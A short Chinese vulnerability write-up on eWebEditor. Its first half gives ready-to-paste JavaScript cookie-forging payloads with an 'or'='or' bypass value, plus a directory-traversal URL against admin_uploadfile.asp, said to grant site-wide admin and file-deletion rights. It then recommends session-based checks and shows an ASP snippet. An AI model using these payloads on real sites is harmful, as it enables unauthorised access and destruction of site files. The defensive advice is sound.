先用cookie注入

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

然后用ewebeditor列目录

/edit/admin_uploadfile.asp?id=14&dir=..

这样就可以用../ 或../../得到全站的管理权限，最可怕的是有全站文件的删除权限。

防止方法，不用cookie验证，而是用session验证，可以解决该问题，其实session可以代替这种情况下的cookie的应用，代码如下：

if session("dj")<>"1" then
   Response.Write "<BR><BR><BR><BR><center>权限不足，你没有此功能

的管理权限"
   Response.end
end if

也有采用cookie加密的方法进行保护，或者生成一个ID号，和cookie一起保护。